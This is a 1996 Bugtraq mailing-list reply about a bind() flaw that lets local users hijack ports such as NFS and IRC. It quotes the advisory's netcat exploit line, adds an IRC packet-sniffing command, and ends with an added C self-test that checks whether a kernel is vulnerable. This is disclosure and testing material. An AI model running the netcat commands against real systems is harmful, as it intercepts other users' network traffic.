Re: BoS: bind() Security Problems
daemon@ATHENA.MIT.EDU (Bernd Lehle)
Wed Jan 31 12:09:16 1996
Date: Wed, 31 Jan 1996 13:18:29 +0100
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: Bernd Lehle <Bernd.Lehle@RUS.Uni-Stuttgart.DE>
X-To: nobody@mail.uu.net
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To: <Pine.LNX.3.91.960130151057.4068A-100000@underground.org> from
"Aleph's K-Rad GECOS Field" at Jan 30, 96 03:18:21 pm
>
>
> System Call: bind()
> Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
> Probably others.
> Requirement: account on system.
> Security Compromise: Stealing packets from
> nfsd, yppasswd, ircd, etc.
> Credits: *Hobbit* <hobbit@avian.org>
> bitblt <bitblt@infosoc.com>
> Aleph One <aleph1@underground.org>
> Synopsis: bind() does not properly check
> to make sure there is not a socket
> already bound to INADDR_ANY on the same
> port when binding to a specific address.
>
IRIX 5.3 is vulnerable, too.
> Exploit:
[..]
> Run netcat:
>
> w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> listening on [192.88.209.5] 2049 ...
To take a look at IRC packets: nc -v -v -l -s Your.IP.Address -p 6667
--
> Bernd Lehle - Stuttgart University Computer Center * A supercomputer <
> Visualization / SFB 382 / Astrophysics * is a machine <
> lehle@rus.uni-stuttgart.de Tel:+49-711-685-5531 * that runs an <
> http://www.tat.physik.uni-tuebingen.de/~lehle * endless loop <
> pgp? -> finger bernd@visbl.rus.uni-stuttgart.de * in 2 seconds <
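As an added example, not code from this thread, here is a small C self-test for the bind() behaviour the post describes: it binds a UDP socket to INADDR_ANY on a kernel-chosen port, then checks whether a second socket without SO_REUSEADDR is allowed to bind the same port on 127.0.0.1. A kernel that enforces the wildcard/specific conflict refuses the second bind with EADDRINUSE; the function names and verdict codes are this example's own.

```c
/* Added example, not code from the original post: probe whether this kernel
 * lets a second socket bind a specific address on a UDP port already held by
 * an INADDR_ANY socket, the bind() weakness discussed in the thread. It uses
 * an ephemeral port, so no running service is touched. */
#include <errno.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Verdict for the second bind(): 1 = it succeeded (no wildcard conflict check,
 * vulnerable), 0 = EADDRINUSE (conflict enforced), -1 = inconclusive error. */
int classify_bind_result(int rc, int err)
{
    if (rc == 0)
        return 1;
    return err == EADDRINUSE ? 0 : -1;
}

int probe_bind_conflict(void)
{
    struct sockaddr_in any, local;
    socklen_t len = sizeof(any);
    int wild, spec, rc, verdict = -1;
    /* The "service": bound to INADDR_ANY on a kernel-chosen port. */
    wild = socket(AF_INET, SOCK_DGRAM, 0);
    if (wild < 0)
        return -1;
    memset(&any, 0, sizeof(any));
    any.sin_family = AF_INET;
    any.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(wild, (struct sockaddr *)&any, sizeof(any)) < 0 ||
        getsockname(wild, (struct sockaddr *)&any, &len) < 0) {
        close(wild);
        return -1;
    }
    /* The second socket, without SO_REUSEADDR, asks for the same port on the
     * loopback address; a correct kernel must refuse with EADDRINUSE. */
    spec = socket(AF_INET, SOCK_DGRAM, 0);
    if (spec >= 0) {
        memset(&local, 0, sizeof(local));
        local.sin_family = AF_INET;
        local.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        local.sin_port = any.sin_port;
        rc = bind(spec, (struct sockaddr *)&local, sizeof(local));
        verdict = classify_bind_result(rc, errno);
        close(spec);
    }
    close(wild);
    return verdict;
}
```

A result of 1 means the host still shows the behaviour the thread reports; 0 means the kernel enforces the conflict, and -1 means the probe could not run (for example, no usable loopback interface).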